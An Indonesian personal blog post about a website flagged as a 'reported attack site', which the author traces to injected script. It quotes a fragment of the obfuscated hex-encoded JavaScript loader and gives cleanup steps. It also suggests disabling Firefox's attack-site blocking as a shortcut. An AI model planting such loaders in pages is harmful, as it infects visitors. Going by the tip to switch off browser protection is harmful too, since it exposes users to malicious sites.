Memanipulasi Reported Attack Site


Pernah suatu kali saya mengalami kejadian seperti ini. Pas buka email kantor di webmail eh muncul peringatan ‘reported attack site’, ada 2 pilihan yakni get me out of here dan why was this site blocked. Kalau kita pilih yang pilihan pertama (get me out of here), langsung keluar dari website dan dialihkan ke google, sedangkan kalau kita pilih pilihan yang kedua dikasih tahu website yang kita buka mengandung harmful virus, dll. Bisa kemungkinan 2, website kita diserang badware dengan disusupi script aneh atau kode website kita mengandung virus.

Setelah saya telusuri ternyata ada script aneh yang di sisipkan oleh hacker iseng di salah satu halaman website, sehingga browser membacanya sebagai mallware dan kemudian memblok web tersebut. Saya sendiri kurang paham maksud dari script itu apa. Kira-kira penggalan scriptnya seperti ini:

c07za=\’\’;yf106d=/* y91fc69b0bf */document;



36642536352533652729293B7D7661\’+c07za+\’72206D796961\’+c07za+\’3D747275653B3C2F7363726970743E\’;yf106d.write(y4c1dd52dcf(y59c73));

Entah berbahaya atau tidak buat orang yang membuka website yang terkena mallware tersebut yang jelas website saya di blok oleh mozzila dan google, dan itu sangat merugikan pemilik website tsb. Setelah saya googling solusinya, saya temukan 2 step untuk menghilangkan blok tersebut :
1. telusuri file-file mana saja yang di sisispi kode aneh itu lalu menghapusnya.
2. Lapor ke google webmaster, verify dan ikuti langkah-langkahnya. Lalu buat statement ke google bahwa saya telah menghapus script aneh tersebut. Kemudian tunggu beberapa saat, dan situs akan kembali seperti sediakala.

Atau kalau mau cara yang lebih gampang, langsung saja buka browser
contoh mozilla : tools-options-security-unchecked block reported attack sites. seperti tampak yang dibawah ini.

Semoga membantu

 

+Alpen Yap

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s